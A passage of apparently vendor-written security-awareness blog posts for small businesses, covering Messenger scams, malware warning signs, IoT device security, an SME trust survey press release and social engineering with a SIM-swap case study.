Check out who a potential partner or customer is claiming to be before you engage with them or share any information over Messenger. A quick search of their name on LinkedIn and a check of the company website or its Facebook Business page should be enough to raise any red flags. And, if in doubt, don’t engage. 

5. Use MFA

Turn on multi-factor authentication (MFA) for your Facebook and Facebook Business accounts. This will make it much harder for a cybercriminal to gain access to your account even if they do steal your login credentials.

6. Don’t trust unusual requests 

Don’t trust any request for your login credentials, password, or MFA code that comes through Messenger. Facebook will never ask for that information through chat.

7. Prioritise privacy 

Keep your Facebook Business page set to the highest privacy and security settings. This alone should help keep you off most scammers’ radar.

8. Report anything fishy

Finally, report any suspicious activity to Facebook. Any examples you can provide are crucial to improving the platform’s security and rooting out malicious users.

As with all phishing attempts, Facebook Messenger for Business scams aren’t particularly sophisticated and can be avoided with a little vigilance. Follow the steps laid out above and you’ll be able to do business using Facebook safely and securely. 

Want to know more about the threats facing small businesses and how to guard against them? Check out our guide to protecting your business on a budget.


How to spot a malware attack on your business: 5 tell-tale signs


Like an unwanted guest causing friction at a party, malware can disguise itself, trick your employees, and cause problems for your business. Here are some tell-tale signs of malware attacks to help you detect threats and show them the way out. 

What is malware?

Malware is an umbrella term for malicious software that will harm your business systems. It’s designed to disrupt computers, networks, devices, and operations. 

5 signs of a malware attack

1. Your device’s performance will suffer

If you notice your device running slowly, crashing, or freezing, and it’s not a sluggish internet connection or because you’re next in line for a new machine from IT, then it might be malware knocking at your door. 

It’s difficult to define how obvious and extreme the disruption will be, as this depends on the type of malware. Some types will use up most of your computer memory, making it extremely frustrating to use your machine or run standard programs and apps like Microsoft Excel or web browsers.

2. Your interface will look different

If you notice your search engine wearing fancy dress, beware. We don’t mean a change like Google Doodles – look out for your default browser or search engine changing, pages redirecting you to another site, and new, unfamiliar browser extensions. This is known as browser hijacking – a type of malware that takes control of your browser in order to compromise your systems.

Malware can also change or delete files, folders, or desktop icons, so if something looks odd or out of place, exercise caution. 


3. Mysterious communications

Like someone sending a party invite on your behalf, malware can allow hackers to send emails, messages, or post on social media without your knowledge or consent. Keep an eye on any company or personal accounts you access from work devices to make sure all posts are legitimate. Check your email sent box, too. 

4. Unusual activity

Hackers may use malware to access your accounts, steal passwords, disable your security software to avoid being noticed, or connect to networks to compromise them. You might also notice unusual financial activity. Hackers achieve this using keyloggers – a type of malware that monitors your keystrokes, allowing cybercriminals to duplicate sensitive information like payment details and passcodes. 

If you notice any inexplicable traffic or activity on your accounts and security systems, flag the problem with your IT department or cybersecurity support provider.

5. Ransom demands

More like a loud intruder than a discreet party crasher, you can’t miss a ransom demand. A hacker will use ransomware to encrypt files, or even your entire computer, to stop you from accessing what you need. The hacker will then demand you pay a ransom for decryption, but there’s no guarantee paying will result in success – 92% of companies that pay ransom don’t get their data back, so be wary of trusting the word of a cybercriminal. 

Mighty malware attacks

NotPetya

In 2017, NotPetya, a Russian ransomworm, went global and caused widespread damage and disruption to businesses. It encrypted files and the hackers behind it demanded ransom for decryption. The attack, which cost $10 billion in total damages, according to a White House assessment, affected behemoths like Maersk, Reckitt Benckiser, and Mondelēz.

MyDoom

The worm – malware that can replicate and spread quickly – first emerged in 2004, but is still active today, and has cost an eye-watering $38 billion in damages. It works by sending an email with a malicious attachment. Once opened, the attachment downloads software that harvests email addresses and sends the virus to all your contacts, perpetuating the problem. MyDoom has also been used to take control of users’ computers and launch distributed denial of service (DDoS) attacks. In 2004, it took down Google for an entire day.

Show malware the door

Now you know the signs of a malware attack, what should you do if you experience one of them? Here are some quick actions that will help to slow or stop the spread of malware, like a bouncer protecting a venue from getting overcrowded with revellers:

  • Communicate the issue, following your business’ cybersecurity procedures
  • Disconnect from the internet
  • Don’t log in to anything 
  • Put your computer in safe mode
  • Run anti-malware software
  • Check and verify your web browser
  • Remove suspicious browser extensions
  • Clear your web browser cache

It’s vital that you communicate the incident to the colleague, department, or company that looks after your cybersecurity. If you have access to 24/7 cybersecurity monitoring, check with your provider; they may already be aware of the problem and working to solve it. Either way, working together and communicating effectively will help you to keep the malware at bay and limit damage to your company data.


IoT: The good, the bad, and the unsecured


As Black Friday and Cyber Monday approach, anticipation is growing for this year’s snips, steals and deals on Internet of Things (IoT) devices. However, amid the thrill of Black Friday bargains, it is crucial to exercise caution and consider the potential security implications associated with purchasing and deploying IoT devices. 

What is IoT?

The Internet of Things, commonly referred to as IoT, is essentially a web of gadgets that share information with each other and with the cloud.

The concept first came about in 1982 when Carnegie Mellon University students linked the department vending machine to their computer, allowing them to check if drinks were in stock and chilled.

However, this wasn’t the first true IoT device, as Tim Berners-Lee’s World Wide Web was still seven years in the future. That honour goes to a toaster created in 1990 by John Romkey. This bizarre device was equipped with a crane system for inserting the bread.

IoT has continued to expand from here and, based on the most recent data, around 15 billion IoT devices are currently connected. It’s anticipated that this number will nearly double, reaching 29.42 billion by 2030.


Where is IoT used – The good, the bad and the bizarre

IoT is used in our homes, offices, manufacturing machinery, agriculture and more. More specifically, this includes smart home devices such as fridges and dishwashers, wearable technology like smartwatches, and medical devices, with pacemakers being a great example.

IoT has the potential to enhance our lives. For example, by facilitating independent living for the elderly with conditions like dementia. This is achieved through IoT technology that gathers atmospheric data linked to residents’ movements within their homes. Should the activity drop below a certain threshold, a device will immediately notify family members or carers of a potential emergency.

Whilst working as a detective in the police, I saw IoT employed for malicious purposes on many occasions. One such occasion was when following a recent relationship separation, the one-time couple had to maintain contact due to their young child. However, whilst Mum was out with her baby she would frequently bump into the child’s father. 

After months of this and other strange activities occurring, it was discovered that a tracking device had been placed in the child’s pushchair. This shared real-time location updates and allowed impromptu meets between father and child.

As you might expect, there are also many bizarre IoT devices out there, including smart egg storage devices that can track the age of eggs and send alerts when your egg stock is running low. Although some may say that is a cracking idea!

IoT security vulnerabilities

A security vulnerability within an IoT device could be several things, from insecure default settings to a lack of physical security. A device that requires no authentication at all lets anybody log in to it. And where log-in details are required, the device may ship with default credentials, such as a username and password of ‘admin’, that anybody can look up.

Many of us will have IP (Internet Protocol) CCTV both in our homes and places of work. Vulnerabilities may exist in these too. Failing to ensure updates are applied to our CCTV could leave known vulnerabilities unaddressed, making it susceptible to exploitation. I have seen many cases of IP CCTV being hacked and people’s personal lives being streamed live on the internet for the world to watch.

What can we do to protect ourselves?

The first thing that we can all do before we click buy on that new device, is to ensure that we are buying it from a reputable company. There are so many devices available to us for comparatively little cost. But buyer beware, often a low price can mean poor security. 

Although we can’t all be expected to comprehend the intricate technical workings of our devices, we can develop a basic understanding of security best practices. This should help ensure that the IoT devices we bring into our homes or workplaces are safe.

So, what are some of the things you can do? In no particular order, here are some of the basic requirements for cybersecurity.

1. Change default passwords

Ensure that you’re using strong and unique passwords to access devices. If in doubt, use the NCSC’s ‘three random words’ approach.

2. Apply patches and updates

Security updates and patches are extremely important in fixing any vulnerabilities in the operating system or firmware installed on your devices. Without these patches, cybercriminals could easily exploit vulnerabilities to hack into your device. 

3. Configure your routers and firewalls to block external traffic

To keep IoT devices within your home safe, you must ensure that nothing outside your home network can connect to your device. By configuring routers and firewalls to block all inbound traffic from the internet, you stop attackers from reaching the device directly.

4. Only purchase devices with high-level security protocols

Try to stick to devices with a connectivity protocol that is secure by design and uses a low data throughput, such as LoRaWAN (long-range wide-area network). You should find these details in the specs of any reputable product.

5. Check your privacy settings

We’ve already mentioned passwords, but there are a few other things you can do to improve your privacy and security. First of all, set up multi-factor authentication (MFA) on all IoT devices, whether that’s biometric authentication (such as fingerprint or facial recognition), a one-time passcode, or security questions. 

MFA makes it much, much harder for any would-be hacker to gain access to your device even if they manage to find it on a network.  

Finally, the single most important thing that we can all do when it comes to security is to keep ourselves updated and aware of new and emerging threats. So, if you’ve read this far, well done.


Press release: A third of SME business leaders do not trust some, most or any employees with confidential information

One in three UK SME business leaders do not trust some, most or any of their employees with confidential information. This is according to a survey of a thousand SME senior leaders and decision-makers across the UK. The report was commissioned by CyberSmart, the category leader in simple and accessible automated cybersecurity technology for SMEs, and conducted by Censuswide*.

Why don’t SME leaders trust employees?

Of these respondents, 80% maintain this is because employees do not fully understand why it is important to keep confidential information secure (51%) or admit that the company does not have enough checks and balances, or the technology to protect confidential information (29%). A further 40% profess that their wariness is attributed to having been burnt in the past, and 23% believe they have disgruntled or disloyal employees. In fact, employees were ranked as the most likely to expose the company to the greatest cybersecurity risk by 30% of SME senior leaders. This was followed closely by former employees (28%), and interns or temporary staff (23%).

Interestingly, as many as 76% of all respondents believe they, along with other members of the senior leadership team, can keep high-level meetings or confidential information private from employees because they have a secure system in place to communicate and store such information. Yet, when digging deeper into the companies’ security policies and procedures, this appears to be an overstatement. Only 55% and 54% of SMEs have a clear set of policies and procedures for sharing information and gaining access to confidential information, respectively. Moreover, a mere 22% have policies and procedures for de-provisioning former employees, while 13% have none of these policies at all.

“A successful business is led by its people, but they can certainly put companies at risk of a cyber incident whether intentionally or more likely, by mistake. Indeed, this research has shown that the biggest reason SME leaders cannot trust their employees with sensitive information comes down to a lack of security awareness training and the implementation of security measures and policies,” said Jamie Akhtar, CEO and co-founder of CyberSmart. “There even appears to be a discrepancy between the number of businesses that allegedly have secure systems in place and those failing to introduce clear policies and procedures for sharing and storing information as well as managing account access for those leaving the business. It is crucial that SMEs re-evaluate their cybersecurity posture and consider the people, processes and technology components of their strategy for maximum protection.”

Other key findings

  • Of the 76% of respondents who claimed to have a secure system in place to communicate and store confidential information, keeping it private from employees, only 60% and 61% have clear policies for sharing information or gaining access to confidential information, respectively. Moreover, only 24% have clear policies and procedures for de-provisioning and 7% have none of these policies.
  • Of the 620 people who claimed to trust their employees fully, a quarter still believe their employees are the biggest cybersecurity risk.
  • Of the 278 people who said former employees were one of the greatest cybersecurity risks, only 24% had clear policies and procedures for deprovisioning.
  • 7% of senior leaders and decision-makers within the UK believe their employees are cyber savvy and can easily snoop on the company’s network and systems or hack into the company’s emails/messages.
  • Other parties that are believed to pose a cybersecurity risk to companies include customers (19%), external partners/suppliers (19%), senior leadership (15%) and consultants (12%).

*The survey was conducted between the 30th of May 2023 and 5th of June 2023.

Read the report in full and download your free copy here.


Social engineering unmasked: guarding against psychological hacks


October is Cyber Security Awareness month, so we’re focussing on a frequently seen threat, social engineering. During my time as a Detective Sergeant leading the Dorset Police Cyber Crime Team, social engineering attacks became one of the most common offences. So, based on my experiences, let’s look at what they are, how they work, and what you can do to guard against them. 

What is social engineering and why should I care?

Social engineering involves an attacker using various methods to manipulate a person into doing what the attacker wants them to do. Social engineers leverage key principles to successfully achieve their aim. These principles include:

  • Authority – This relies on the fact that most people will take instruction from someone who appears to be in charge
  • Intimidation – Scaring or bullying an individual
  • Consensus – People will often want to do what others are doing
  • Scarcity – Making something appear more desirable because it may be the last one
  • Familiarity – The recipient likes the individual or organisation the social engineer is claiming to be
  • Trust – The social engineer builds a relationship with the target
  • Urgency – Creating the feeling that action must be taken immediately

Each of these principles will trigger an emotional response in the recipient, and this is what the attacker relies on. When we react emotionally, we are not thinking clearly.

Social engineering is the cyber criminal’s go-to tool for achieving their aims. This could be stealing data, money or your identity. The final victim of the attack may not even be the person that is socially engineered, the victim could be their employer or even a loved one. 

The impacts of this can be significant, whether it is a big financial loss, reputational damage or even the psychological stress caused. In a worst-case scenario, this could lead to a business closing down or an individual coming to harm.


How big a problem is social engineering? 

The stats don’t lie! Social engineering is a significant problem.

According to the Cyber Security Breaches Survey 2023, phishing (a form of social engineering) is by far the most common type of cyber attack.  A staggering 79% of businesses and 83% of charities reported being targeted by phishing attacks in the last 12 months. In fact, the problem is so widespread that the average organisation is targeted by over 700 social engineering attacks each year. And some 98% of cyberattacks involve a form of social engineering.

Nor is the problem confined to the well-heeled. Social engineering attacks are 350% more common for employees of small businesses than at larger enterprises.

What are the most common types of Social Engineering?

As discussed previously, there are many types of social engineering. This includes phishing, pretexting, tailgating, baiting, watering hole attacks and many more. Understanding the many forms of social engineering will help you defend against them.

Phishing

The most widely recognised form of social engineering is phishing. Phishing is most commonly launched via email but can also be conducted through SMS (smishing) or a phone call (vishing).

A phishing email will present itself in your inbox and on the surface appear to be a genuine email. However, the email will be from an attacker and may contain malicious attachments or links. These could be used to take some form of control over your computer or to redirect you to a spoof website in which you input your credentials, allowing the attacker to steal them.

Pretexting

Pretexting is another commonly used social engineering technique. In this attack, the social engineer will use a fictional scenario to justify why they are contacting you. Once contact has been made, the social engineer will try to obtain information from you.

For example, the attacker could pose as the IT help desk, calling you to help with a reported issue with your computer, gaining your trust and offering to connect to your computer to quickly resolve the problem remotely. If successful, the attacker could then exploit this access to your computer.

Tailgating

Tailgating is slightly different. These attacks are aimed at physical, rather than digital, entry into your business. Usually, the social engineer follows you as you open and walk through a secure entrance, gaining access along with you.

This scenario is one that we have all faced. You use your keycard to open the office door, as you walk through someone runs up behind you and you feel obliged to hold the door for them. It may be that you see someone approaching the door carrying a heavy box. Although this sounds like something we would never do, our emotions and initial reaction to want to help people who are in a situation that we have all been in prompts us to take action and hold that door open.

Social engineering in the real world: a dating disaster 

Having worked in law enforcement for 15 years, I have investigated hundreds of crimes. 

One case I investigated was the takeover of a business and subsequent fraudulent transactions over 48 hours. This all started with social engineering. 

In this case, a business owner had signed up for a dating website. The business owner began chatting to someone via instant messages on the site; there was nothing unusual about this. The conversation was going well and the pair discussed their likes and dislikes. The conversation moved to star signs and the victim revealed their date and place of birth. Again, this was all within the context of the conversation and appeared quite normal. However, things were not as they seemed.

Romance turns to horror 

Unbeknownst to the victim, the social engineer had struck gold. A quick Google search of the victim’s name revealed his business website, including his mobile phone number.

This information was used to contact his mobile phone provider and port his mobile number to the social engineer’s SIM card. The victim’s phone was no longer receiving text messages or calls, as they were being sent to a phone that the social engineer controlled.

But it didn’t stop there. Using the victim’s personal details and phone number, the social engineer proceeded to take control of the business’s website and email address, ultimately taking out a loan in the business owner’s name. Within 48 hours the victim had lost control of his business and owed the bank thousands of pounds. He only realised something was up when he couldn’t use his phone.

Fortunately, he was able to recover his phone number and some of the money was recovered. However, this took weeks to rectify and the time, stress and effort he put into getting back to square one is not to be overlooked.

How to recognise social engineering attacks

We are all very busy, and the digital world is always available to us, whether we are sitting at our desks or in the back of a taxi using our phones. The next meeting or deadline is always within touching distance. Because of this, we may not always have our full attention focused on how we respond to the many interactions we have during our day.

Here are three strategies to help you recognise social engineering attacks:

1. Trust Your Instincts

If something feels off or too good to be true, it probably is. Trust your gut feelings when you encounter suspicious requests or situations. 

2. Be wary of your emotions

Social engineers want to trigger an emotional response to encourage you to make a quick decision. Take a step back and consider whether the situation truly requires immediate action.

3. Verify unusual requests

If you receive unusual requests, such as transferring money, providing access to a building, or sharing sensitive data, independently verify the request through a trusted and known communication channel.

How to protect yourself

The threat will always be there and, as we have seen, it can take many forms. Here are three simple measures that we can put in place, both at work and in our personal lives, to help counteract the threat.

Use MFA

Whenever possible, enable multi-factor authentication (MFA) on your accounts. Even if an attacker obtains your password, they won’t be able to access your accounts without the second factor.

Don’t share too much on social media

Be cautious about sharing personal information on social media platforms. As we saw in the case study, attackers will use information gleaned to craft convincing social engineering attacks.

Education and training

Regular security awareness training for everyone is vital. Proofpoint found that only 56% of organisations with a security awareness program train their entire workforce. We lock all our doors and windows at night, and we should train everybody to ensure common social engineering tactics are recognised and stopped before they can harm us.

Looking to protect your business on a budget without sacrificing security? Read our guide to find out how.
